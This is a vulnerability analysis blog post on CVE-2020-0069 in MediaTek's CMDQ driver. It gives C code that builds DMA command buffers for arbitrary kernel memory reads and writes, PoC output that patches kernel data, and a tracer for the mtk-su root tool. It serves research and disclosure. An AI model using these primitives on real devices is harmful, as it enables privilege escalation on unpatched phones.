CVE-2020-0069: Autopsy of the Most Stable MediaTek Rootkit

Introduction

In March 2020, Google patched a critical vulnerability affecting many MediaTek-based devices [1]. MediaTek had known about this vulnerability since April 2019 (10 months before it was fixed). It allows an unprivileged local attacker to read and write system memory, leading to privilege escalation. There is even an exploit binary called mtk-su [2], developed in 2019, that can root many vulnerable devices. At the time of writing, little information about this vulnerability is available, so we decided to take a look for ourselves.

About CVE-2020-0069

According to MediaTek [3], this vulnerability allows a local attacker to achieve arbitrary read/write of physical memory addresses, leading to privilege escalation. The impacted module is the MediaTek Command Queue driver (or CMDQ driver). Using IOCTL on the driver, it is possible for an attacker to allocate a DMA (Direct Memory Access) buffer, and send commands to the DMA hardware in order to have it read and write physical addresses.

As a reminder, Direct Memory Access is a feature that allows dedicated hardware to read from or write to the main memory (the RAM) directly. The aim is to speed up the system by performing large memory transfers without tying up the CPU.
This driver appears to let userland communicate with a DMA controller in order to perform media or display-related tasks.

There are more than 10 SoCs (System on Chip) impacted by this vulnerability, and even more devices. We have been able to exploit it on the Xiaomi Redmi 6a device (using a MediaTek MT6762M SoC).

The CMDQ driver

Several versions of the sources for this driver are available on the web. For this study, we mainly looked into the Xiaomi Redmi 6a open source kernel [4].
The driver implementation can be found in drivers/misc/mediatek/cmdq. The associated device node is either /dev/mtk-cmdq or /proc/mtk-cmdq, depending on the SoC, and it is accessible to any application without any permission (at least on the vulnerable devices).

As said before, the driver can be controlled from userland using the ioctl syscall.

#define CMDQ_IOCTL_EXEC_COMMAND _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 3, 
    struct cmdqCommandStruct)
#define CMDQ_IOCTL_QUERY_USAGE  _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 4, 
    struct cmdqUsageInfoStruct)

/*  */
/* Async operations */
/*  */

#define CMDQ_IOCTL_ASYNC_JOB_EXEC _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 5, 
    struct cmdqJobStruct)
#define CMDQ_IOCTL_ASYNC_JOB_WAIT_AND_CLOSE _IOR(CMDQ_IOCTL_MAGIC_NUMBER, 6, 
    struct cmdqJobResultStruct)

#define CMDQ_IOCTL_ALLOC_WRITE_ADDRESS _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 7, 
    struct cmdqWriteAddressStruct)
#define CMDQ_IOCTL_FREE_WRITE_ADDRESS _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 8, 
    struct cmdqWriteAddressStruct)
#define CMDQ_IOCTL_READ_ADDRESS_VALUE _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 9, 
    struct cmdqReadAddressStruct)

From the available operations, we are going to look into the following ones:

  • CMDQ_IOCTL_ALLOC_WRITE_ADDRESS is used to allocate a DMA buffer, and takes a struct cmdqWriteAddressStruct as argument;
  • CMDQ_IOCTL_FREE_WRITE_ADDRESS is used to free a previously allocated DMA buffer;
  • CMDQ_IOCTL_EXEC_COMMAND sends a command buffer to the DMA controller and takes a struct cmdqCommandStruct as argument;
  • CMDQ_IOCTL_READ_ADDRESS_VALUE can be used to read DMA buffer values.

Allocating a DMA buffer

When calling CMDQ_IOCTL_ALLOC_WRITE_ADDRESS, we provide a struct cmdqWriteAddressStruct containing the size of the requested buffer in the field count. In return, we receive a physical address in the field startPA. This address cannot be accessed directly from userland. To access this memory area, we can use CMDQ_IOCTL_EXEC_COMMAND.

It is possible to free a DMA buffer, by calling CMDQ_IOCTL_FREE_WRITE_ADDRESS with the struct cmdqWriteAddressStruct structure from the previous allocation.
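
As a rough illustration, the allocation and release calls could look like the sketch below. The structure layout (two 32-bit fields), the magic value 'x' and the helper names cmdq_alloc_dma and cmdq_free_dma are assumptions made for this example; the real definitions live in the driver headers.

```c
#include <fcntl.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Assumed layout: the post only names the fields count and startPA. */
struct cmdqWriteAddressStruct {
    uint32_t count;   /* [IN]  requested buffer size */
    uint32_t startPA; /* [OUT] physical address of the DMA buffer */
};

/* Assumed magic value; check the driver headers of the target kernel. */
#define CMDQ_IOCTL_MAGIC_NUMBER 'x'
#define CMDQ_IOCTL_ALLOC_WRITE_ADDRESS \
    _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 7, struct cmdqWriteAddressStruct)
#define CMDQ_IOCTL_FREE_WRITE_ADDRESS \
    _IOW(CMDQ_IOCTL_MAGIC_NUMBER, 8, struct cmdqWriteAddressStruct)

/* Hypothetical helper: opens the device and allocates a DMA buffer.
 * Returns the open file descriptor on success, -1 on failure. */
int cmdq_alloc_dma(const char *dev_path, uint32_t count,
                   struct cmdqWriteAddressStruct *buf)
{
    int fd = open(dev_path, O_RDONLY);
    if (fd < 0)
        return -1;

    buf->count = count;
    buf->startPA = 0;
    if (ioctl(fd, CMDQ_IOCTL_ALLOC_WRITE_ADDRESS, buf) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Hypothetical helper: frees the buffer using the same structure that
 * the allocation filled in, then closes the device. */
int cmdq_free_dma(int fd, struct cmdqWriteAddressStruct *buf)
{
    int rc = ioctl(fd, CMDQ_IOCTL_FREE_WRITE_ADDRESS, buf);
    close(fd);
    return rc;
}
```

On a vulnerable device, the path passed to cmdq_alloc_dma would be /dev/mtk-cmdq or /proc/mtk-cmdq; on any other machine the call simply fails and returns -1.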

Executing commands

CMDQ_IOCTL_EXEC_COMMAND takes a struct cmdqCommandStruct as parameter.

struct cmdqCommandStruct {
 [...]
 /* [IN] pointer to instruction buffer. Use 64-bit for compatibility. */
 /* This must point to an 64-bit aligned u32 array */
 cmdqU32Ptr_t pVABase;
 /* [IN] size of instruction buffer, in bytes. */
 u32 blockSize;
 /* [IN] request to read register values at the end of command */
 struct cmdqReadRegStruct regRequest;
 /* [OUT] register values of regRequest */
 struct cmdqRegValueStruct regValue;
 /* [IN/OUT] physical addresses to read value */
 struct cmdqReadAddressStruct readAddress;
 [...]

As said before, this IOCTL sends commands to be executed by the DMA controller. These commands are placed in a userland buffer, whose address has to be put in the field pVABase and whose size has to be put in the field blockSize.

The field readAddress from the command struct can be used to read values from the DMA buffer after the execution of our commands.
The field readAddress.dmaAddresses points to a userland buffer which contains addresses from our DMA buffer. The number of addresses is given by the field readAddress.count. The kernel reads all of these addresses and places the values in the userland buffer pointed to by the field readAddress.values.

Reading the DMA buffer can also be achieved by using the IOCTL command CMDQ_IOCTL_READ_ADDRESS_VALUE.

Commands description

A command consists of two 32-bit words and is identified by a command code.

enum cmdq_code {
 CMDQ_CODE_READ  = 0x01,
 CMDQ_CODE_MASK = 0x02,
 CMDQ_CODE_MOVE = 0x02,
 CMDQ_CODE_WRITE = 0x04,
 CMDQ_CODE_POLL  = 0x08,
 CMDQ_CODE_JUMP = 0x10,
 CMDQ_CODE_WFE = 0x20,
 CMDQ_CODE_EOC = 0x40,
 [...]
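
To make the layout concrete, here is a minimal sketch of how the command code can be pulled out of a command. It assumes, based on the snippets later in this post, that the code sits in the top byte of the second 32-bit word. The OP_* names and both helper functions are hypothetical; only the numeric values come from the enum above.

```c
#include <stdint.h>

/* Numeric values copied from the cmdq_code excerpt; names are local. */
enum {
    OP_READ  = 0x01,
    OP_MOVE  = 0x02, /* CMDQ_CODE_MASK shares this value */
    OP_WRITE = 0x04,
    OP_POLL  = 0x08,
    OP_JUMP  = 0x10,
    OP_WFE   = 0x20,
    OP_EOC   = 0x40
};

/* words[0] is the first 32-bit word, words[1] the second one.
 * The command code is assumed to occupy bits 31..24 of words[1]. */
uint8_t cmdq_opcode(const uint32_t words[2])
{
    return (uint8_t)(words[1] >> 24);
}

/* Human-readable name for a command code. */
const char *cmdq_opcode_name(uint8_t code)
{
    switch (code) {
    case OP_READ:  return "READ";
    case OP_MOVE:  return "MOVE/MASK";
    case OP_WRITE: return "WRITE";
    case OP_POLL:  return "POLL";
    case OP_JUMP:  return "JUMP";
    case OP_WFE:   return "WFE";
    case OP_EOC:   return "EOC";
    default:       return "UNKNOWN";
    }
}
```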

Here is a description of some commands we are going to use.

CMDQ_CODE_WRITE and CMDQ_CODE_READ

[Figure: READ and WRITE command format]

The write command writes the value held in a data register to the address held in the address register.
The read command reads the value at the address held in the address register and places the result into the data register.

Depending on the option bits (TYPE A and TYPE B in the figure), the address can be computed from a value called subsysID, placed in the REG NUMBER field, and an offset placed in the VALUE field. The subsysID is then replaced by an actual physical address referenced in the kernel DTS.

CMDQ_CODE_MOVE

[Figure: MOVE command format]

This command places a value (up to 48 bits) into a register. The destination can be either a data register or an address register, and the value can be arbitrary data or an address. This is probably the biggest issue here, since no checks are made on the address.
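
The following sketch decodes a MOVE command back into its register and 48-bit value, which is roughly what a tracer has to do. The field positions are inferred from the snippets in this post (low 32 bits in the first word, upper 16 bits in the low half of the second word, register number starting at bit 16); the 5-bit register mask and the names cmdq_move and cmdq_decode_move are assumptions.

```c
#include <stdint.h>

#define CMDQ_CODE_MOVE 0x02u

/* Decoded form of a MOVE command (hypothetical helper type). */
struct cmdq_move {
    uint8_t  reg;   /* destination register id, e.g. 0x17 for P7 */
    uint64_t value; /* up to 48 bits */
};

/* Returns 0 and fills *out if the command is a MOVE, -1 otherwise. */
int cmdq_decode_move(const uint32_t words[2], struct cmdq_move *out)
{
    if ((words[1] >> 24) != CMDQ_CODE_MOVE)
        return -1;

    /* Assumption: register ids fit in 5 bits (0x00..0x17). */
    out->reg = (uint8_t)((words[1] >> 16) & 0x1f);

    /* Upper 16 bits of the value live in the low half of word 1. */
    out->value = ((uint64_t)(words[1] & 0xffffu) << 32) | words[0];
    return 0;
}
```

Note that nothing in this format distinguishes a harmless constant from a physical address: the hardware accepts whatever 48-bit value it is given.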

CMDQ_CODE_WFE

[Figure: WFE command format]

WFE stands for Wait For Event and clear. From what we understand, it can be used to block the usage of some registers, much like a mutex. The event flag used with this command is associated with the set of registers used in the command buffer. For example, for the registers CMDQ_DATA_REG_DEBUG (R11) and CMDQ_DATA_REG_DEBUG_DST (P7), the event (or token, as it is called in the sources) CMDQ_SYNC_TOKEN_GPR_SET_4 has to be used.
We need to use the WFE command at the beginning and at the end of each command buffer.

CMDQ_CODE_EOC

EOC stands for End Of Command. It has to be placed at the end of each command buffer, after the CMDQ_CODE_WFE command, to indicate the end of the command list. It seems to contain a lot of flags, but for our usage we only needed to set what seems to be the IRQ flag.

CMDQ_CODE_JUMP

According to the comments in the sources, this command jumps within the command buffer by an offset. We use it at the very end of each command buffer, after the CMDQ_CODE_EOC command, always with the offset 0x8, i.e. to jump to the previous command. Our theory is that the DMA controller implements a prefetch mechanism, and that this command makes sure the CMDQ_CODE_EOC command is taken into account.
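
Putting the last three sections together, every command buffer is framed as WFE, payload commands, WFE, EOC, JUMP. The sketch below only checks that ordering; it assumes the command code sits in the top byte of the second word of each command, and the function name cmdq_is_framed is hypothetical. It does not validate the flags inside the WFE, EOC or JUMP commands.

```c
#include <stddef.h>
#include <stdint.h>

/* Numeric values from the cmdq_code excerpt; names are local. */
enum { OP_JUMP = 0x10, OP_WFE = 0x20, OP_EOC = 0x40 };

/* Command code of the cmd_index-th 64-bit command in the buffer. */
static uint8_t op_at(const uint32_t *words, size_t cmd_index)
{
    return (uint8_t)(words[2 * cmd_index + 1] >> 24);
}

/* Returns 1 when the buffer starts with WFE and ends with
 * WFE, EOC, JUMP (in that order), 0 otherwise. */
int cmdq_is_framed(const uint32_t *words, size_t n_cmds)
{
    if (n_cmds < 4)
        return 0;

    return op_at(words, 0) == OP_WFE
        && op_at(words, n_cmds - 3) == OP_WFE
        && op_at(words, n_cmds - 2) == OP_EOC
        && op_at(words, n_cmds - 1) == OP_JUMP;
}
```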

The registers

In the command descriptions, we mentioned registers. There are two kinds of registers:

  • value registers (from R0 to R15) that are composed of 32 bits;
  • address registers (from P0 to P7) that are composed of 64 bits.

enum cmdq_gpr_reg {
    /* Value Reg, we use 32-bit */
    /* Address Reg, we use 64-bit */
    /* Note that R0-R15 and P0-P7 actually share same memory */
    /* and R1 cannot be used. */

    CMDQ_DATA_REG_JPEG = 0x00,  /* R0 */
    CMDQ_DATA_REG_JPEG_DST = 0x11,  /* P1 */

    CMDQ_DATA_REG_PQ_COLOR = 0x04,  /* R4 */
    CMDQ_DATA_REG_PQ_COLOR_DST = 0x13,  /* P3 */

    CMDQ_DATA_REG_2D_SHARPNESS_0 = 0x05,    /* R5 */
    CMDQ_DATA_REG_2D_SHARPNESS_0_DST = 0x14,    /* P4 */

    CMDQ_DATA_REG_2D_SHARPNESS_1 = 0x0a,    /* R10 */
    CMDQ_DATA_REG_2D_SHARPNESS_1_DST = 0x16,    /* P6 */

    CMDQ_DATA_REG_DEBUG = 0x0b, /* R11 */
    CMDQ_DATA_REG_DEBUG_DST = 0x17, /* P7 */
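
The comments in the enum suggest a simple numbering: identifiers 0x00 to 0x0f map to R0 to R15, and identifiers 0x10 to 0x17 map to P0 to P7. The helper below turns an identifier into that name; the mapping is inferred from the excerpt (only some identifiers appear in it) and the function name cmdq_reg_name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Writes "R<n>" for ids 0x00..0x0f and "P<n>" for ids 0x10..0x17.
 * Returns 0 on success, -1 for ids outside both ranges. */
int cmdq_reg_name(uint8_t id, char *out, size_t out_len)
{
    if (id <= 0x0f) {
        snprintf(out, out_len, "R%u", (unsigned)id);
        return 0;
    }
    if (id <= 0x17) {
        snprintf(out, out_len, "P%u", (unsigned)(id - 0x10));
        return 0;
    }
    return -1;
}
```

For instance, the identifier 0x0b used by CMDQ_DATA_REG_DEBUG yields "R11" and 0x17 used by CMDQ_DATA_REG_DEBUG_DST yields "P7", matching the comments in the enum.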

Let’s play with the driver

Now that we understand a bit better how the driver works, let’s play with it in order to achieve basic memory reads and writes.

Writing memory

To write a 32-bit value to memory, we can use the following commands:

  • MOVE a 32-bit value into the value register;
  • MOVE the address where we want to put our value into the address register;
  • WRITE the value from the value register at the address from the address register.

// move value into CMDQ_DATA_REG_DEBUG
// (the value is 32 bits wide, so the upper bits of the command stay at zero)
*(uint32_t*)(command->pVABase + command->blockSize) = value;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG << 16;
command->blockSize += 8;

// move pa_address into CMDQ_DATA_REG_DEBUG_DST
// (low 32 bits in the first word, upper bits in the second word)
*(uint32_t*)(command->pVABase + command->blockSize) = (uint32_t)pa_address;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG_DST << 16
                                                | (pa_address + offset) >> 0x20;
command->blockSize += 8;

// write CMDQ_DATA_REG_DEBUG at the address held in CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = CMDQ_DATA_REG_DEBUG;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_WRITE << 24 | 3 << 22
                                                | CMDQ_DATA_REG_DEBUG_DST << 16;
command->blockSize += 8;
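
The same three commands can be built into a plain array, which makes the encoding easier to inspect outside the driver context. This is a standalone sketch, not the PoC code: the helper names emit and cmdq_build_write32 are hypothetical, and the bit positions (1 << 23 for MOVE, 3 << 22 for WRITE) are copied from the snippet above without knowing their exact meaning.

```c
#include <stddef.h>
#include <stdint.h>

#define CMDQ_CODE_MOVE          0x02u
#define CMDQ_CODE_WRITE         0x04u
#define CMDQ_DATA_REG_DEBUG     0x0bu /* R11 */
#define CMDQ_DATA_REG_DEBUG_DST 0x17u /* P7 */

/* Appends one command (two 32-bit words); returns the new word count. */
static size_t emit(uint32_t *buf, size_t n, uint32_t first, uint32_t second)
{
    buf[n] = first;
    buf[n + 1] = second;
    return n + 2;
}

/* Fills buf (at least 6 words) with MOVE value, MOVE address, WRITE.
 * Returns the number of 32-bit words written. */
size_t cmdq_build_write32(uint32_t *buf, uint64_t pa, uint32_t value)
{
    size_t n = 0;

    /* MOVE the 32-bit value into the value register. */
    n = emit(buf, n, value,
             CMDQ_CODE_MOVE << 24 | 1u << 23 | CMDQ_DATA_REG_DEBUG << 16);

    /* MOVE the target address (up to 48 bits) into the address register. */
    n = emit(buf, n, (uint32_t)pa,
             CMDQ_CODE_MOVE << 24 | 1u << 23 | CMDQ_DATA_REG_DEBUG_DST << 16
             | (uint32_t)((pa >> 32) & 0xffffu));

    /* WRITE the value register at the address in the address register. */
    n = emit(buf, n, CMDQ_DATA_REG_DEBUG,
             CMDQ_CODE_WRITE << 24 | 3u << 22 | CMDQ_DATA_REG_DEBUG_DST << 16);

    return n;
}
```

The resulting words still have to be wrapped between the WFE commands and followed by EOC and JUMP before being handed to CMDQ_IOCTL_EXEC_COMMAND.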

Reading memory

Reading a 32-bit value from memory can be done in four commands:

  • MOVE the address to be read (pa_address) into the address register;
  • READ the data at the address pointed to by the address register into the value register;
  • MOVE the DMA buffer address (dma_address) into the address register;
  • WRITE the data from the value register to the address held in the address register.

We need to place these commands in a previously allocated buffer referenced by the pVABase field of the struct cmdqCommandStruct. The command buffer size has to be put in the field blockSize.

// move pa_address into CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = (uint32_t)pa_address;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG_DST << 16
                                                | (pa_address + offset) >> 0x20;
command->blockSize += 8;

// read value at CMDQ_DATA_REG_DEBUG_DST into CMDQ_DATA_REG_DEBUG
*(uint32_t*)(command->pVABase + command->blockSize) = CMDQ_DATA_REG_DEBUG;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_READ << 24 | 3 << 22
                                                  | CMDQ_DATA_REG_DEBUG_DST << 16;
command->blockSize += 8;

// move dma_address into CMDQ_DATA_REG_DEBUG_DST
// (the upper bits must come from dma_address, not from pa_address)
*(uint32_t*)(command->pVABase + command->blockSize) = (uint32_t)dma_address;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_MOVE << 24 | 1 << 23
                                                | CMDQ_DATA_REG_DEBUG_DST << 16
                                                | dma_address >> 0x20;
command->blockSize += 8;

// write CMDQ_DATA_REG_DEBUG at the address held in CMDQ_DATA_REG_DEBUG_DST
*(uint32_t*)(command->pVABase + command->blockSize) = CMDQ_DATA_REG_DEBUG;
*(uint32_t*)(command->pVABase + command->blockSize + 4) = CMDQ_CODE_WRITE << 24 | 3 << 22
                                                  | CMDQ_DATA_REG_DEBUG_DST << 16;
command->blockSize += 8;

Then we inform the driver that we want to read the values in the DMA buffer by filling the readAddress field:

*(uint32_t*)((uint32_t)command->readAddress.dmaAddresses) = dma_address;
command->readAddress.count = offset;

The result will be written to readAddress.values, which has to be allocated beforehand.

Small PoC

To identify the physical addresses used by the kernel, one can read the file /proc/iomem (root permission needed).

# cat /proc/iomem
[...]
40000000-545fffff : System RAM
  40008000-415fffff : Kernel code
  41800000-41d669b3 : Kernel data
[...]

These addresses are statically configured and stay the same across reboots.

The PoC is composed of two programs:

  • a C program that allows basic memory reads and writes;
  • a shell script that calls the previous program to search for the first occurrence of the “Linux” string in the kernel data memory and then replaces it with “minix”.

$ uname -a
Linux localhost 4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l
$ sh poc.sh
[+] Found Linux string at 0x4180bc00
[+] Found Linux string at 0x4180bea0
[+] Write the patched value
$ uname -a
minix  4.9.77+ #1 SMP PREEMPT Mon Jan 21 18:32:19 WIB 2019 armv7l

Very useful…

We have been able to read and write kernel data memory, and we can do the same with any other system memory region, bypassing the permissions and protections in place in the system.
So, apart from playing small tricks, it is possible to use this vulnerability to modify any part of the system memory, such as kernel code and data, in order to achieve a privilege escalation.

The mtk-su binary does a lot of interesting things in kernel memory using this vulnerability to achieve root.
We are not going to give more details about the kernel exploitation methods used by mtk-su in this post. However, those who want to know more can have a look at the small tracing library we made. It has to be preloaded when launching mtk-su, and it traces some IOCTLs of the CMDQ driver, such as the commands sent to the driver.

$ mkdir mtk-su
$ LD_PRELOAD=./syscall-hook.so ./mtk-su
alloc failed
alloc count=400 startPA=0x5a733000
uncatched ioctl 40e07803
exec command (num 0) ( blockSize=8040, readAddress.count=0 ) dumped into cmd-0
exec command (num 1) ( blockSize=3e0, readAddress.count=1e ) dumped into cmd-1
[...]
$ cat mtk-su/cmd-1
WFE to_wait=1, wait=1, to_update=1, update=0, event=1da
MOVE 40928000 into reg 17
READ  address reg 17, data reg b
[...]
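
The request number reported in the "uncatched ioctl" line can be split into its fields by hand. The sketch below assumes the generic Linux ioctl encoding (8 bits of command number, 8 bits of type, 14 bits of size, 2 bits of direction), which is the one used on ARM; the names ioctl_fields and ioctl_decode are hypothetical.

```c
#include <stdint.h>

/* Fields of a Linux ioctl request number (generic encoding). */
struct ioctl_fields {
    unsigned dir;  /* bits 31..30: 1 = write (_IOW), 2 = read (_IOR) */
    unsigned size; /* bits 29..16: size of the argument structure */
    unsigned type; /* bits 15..8:  magic number of the driver */
    unsigned nr;   /* bits 7..0:   command number */
};

struct ioctl_fields ioctl_decode(uint32_t req)
{
    struct ioctl_fields f;

    f.nr   = req & 0xffu;
    f.type = (req >> 8) & 0xffu;
    f.size = (req >> 16) & 0x3fffu;
    f.dir  = (req >> 30) & 0x3u;
    return f;
}
```

Applied to 0x40e07803, this gives a write-direction request with type 0x78 (the character 'x'), command number 3 and an argument size of 0xe0 bytes. Command number 3 is the one used by CMDQ_IOCTL_EXEC_COMMAND in the listing at the beginning of this post.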

The PoC and the tracer library can be found in Quarkslab’s repository: CVE-2020-0069_poc.

Conclusion

This vulnerability is quite critical. It basically allows any application to read and write all the system memory, including the kernel memory.
We may wonder why this device driver needs to be accessible to every application and not only to the HAL (Hardware Abstraction Layer) and media-related
processes. It would at least add an extra step to achieve root from an application with zero privileges.

According to the sources of the Fire HD 8 Linux kernel [5], the issue has been fixed by parsing all the commands from the command buffer and
by validating each command as well as the addresses and registers in use. For example, only the addresses from the DMA buffer are allowed to be moved to an address register.
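
To give an idea of what such a check involves, here is a simplified sketch of the address rule only. It is not the code of the actual patch: the function name, the field positions (taken from the snippets in this post) and the assumption that register identifiers 0x10 and above are address registers are all ours.

```c
#include <stddef.h>
#include <stdint.h>

#define CMDQ_CODE_MOVE 0x02u

/* Returns 1 if every MOVE into an address register targets a 32-bit
 * word inside [dma_pa, dma_pa + dma_len), 0 otherwise.
 * Simplification: MASK shares the MOVE code and is treated as MOVE. */
int cmdq_moves_stay_in_dma(const uint32_t *words, size_t n_cmds,
                           uint64_t dma_pa, uint64_t dma_len)
{
    for (size_t i = 0; i < n_cmds; i++) {
        uint32_t first = words[2 * i];
        uint32_t second = words[2 * i + 1];

        if ((second >> 24) != CMDQ_CODE_MOVE)
            continue;

        /* Assumption: ids below 0x10 are value registers (R0..R15). */
        uint32_t reg = (second >> 16) & 0x1fu;
        if (reg < 0x10)
            continue;

        uint64_t addr = ((uint64_t)(second & 0xffffu) << 32) | first;
        if (dma_len < 4 || addr < dma_pa || addr - dma_pa > dma_len - 4)
            return 0;
    }
    return 1;
}
```

With such a rule in place, the command "MOVE 40928000 into reg 17" from the mtk-su trace would be rejected, since that address does not belong to the DMA buffer allocated at 0x5a733000.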

As we are not the ones who discovered this vulnerability, we did not talk with MediaTek about this issue. But from a technical point of view, there is nothing that should have made this vulnerability take so long to fix.
According to the XDA Developers article [6], MediaTek had a fix since May 2019, but it took 10 months to have it widely patched in end-user devices. Thanks to the Android license agreement, Google has been able to force OEMs to update their devices.
This is a great example of the complexity of patch management in the Android ecosystem, where many actors (SoC manufacturers, OEMs, ODMs) have to act together to have a vulnerability fixed on the end-user device. In the end, it seems that only the legal aspects can force all these actors to integrate fixes.

We might now wonder whether devices that embed a MediaTek SoC and run an AOSP-based OS with no Android license agreement will benefit from this fix, since their vendors have no legal obligation to integrate it.

References

[1] https://source.android.com/security/bulletin/2020-03-01
[2] https://forum.xda-developers.com/android/development/amazing-temp-root-mediatek-armv8-t3922213
[3] https://www.xda-developers.com/files/2020/03/CVE-2020-0069.png
[4] https://github.com/MiCode/Xiaomi_Kernel_OpenSource/tree/cactus-p-oss
[5] https://www.amazon.com/gp/help/customer/display.html?tag=androidpolice-20&nodeId=200203720
[6] https://www.xda-developers.com/mediatek-su-rootkit-exploit/

Acknowledgements

Many thanks to my colleagues for proofreading this post.
